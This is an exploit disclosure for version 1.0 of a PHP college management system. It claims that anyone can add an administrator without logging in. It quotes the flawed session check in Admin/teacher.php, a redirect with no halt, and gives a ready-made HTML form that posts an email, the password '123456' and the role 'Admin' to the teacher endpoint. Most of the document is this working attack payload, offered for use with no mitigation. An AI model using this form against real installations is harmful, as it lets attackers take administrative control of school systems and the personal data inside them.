# Exploit Title: college management system - Add admin (Unauthenticated) # Date: 01/10/2021 # Exploit Author: Abdulrahman https://twitter.com/infosec_90 # Vendor Homepage: https://www.eedunext.com/ # Software Link: https://code-projects.org/college-management-system-in-php-with-source-code/ # Version: 1.0 # Tested on: Kali Linux in Admin/teacher.php in line 1 <?php session_start(); if (!$_SESSION["LoginAdmin"]) { header('location:../login/login.php'); } require_once "../connection/connection.php"; $_SESSION['LoginTeacher']=""; ?> in Admin/teacher.php line 23 :$email=$_POST["email"]; line 63 :$password=$_POST['password']; line 65 :$role=$_POST['role']; role Admin,Teacher,Student POC : <html lang="en"> <head> <title>ADD Amin</title> </head> <body class="login-background"> <!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <!-- css style goes here --> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous"> <!-- css style go to end here --> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"> </head> <body> <div class="row m-3"> <div class="col-md-12"> <form action="http://127.0.0.1/2/College-Management-System/admin/Teacher.php" method="POST" enctype="multipart/form-data"> <div class="row mt-3"> <div> <input type="text" name="email" value="infosec_90@admin.com"> <input type="text" name="password" value="123456"> <input type="text" name="role" value="Admin"> <input type="text" name="account" value="Activate"> </div> <div class="modal-footer"> <input type="submit" class="btn btn-primary px-5" name="btn_save"> </div> </form> </div> </div>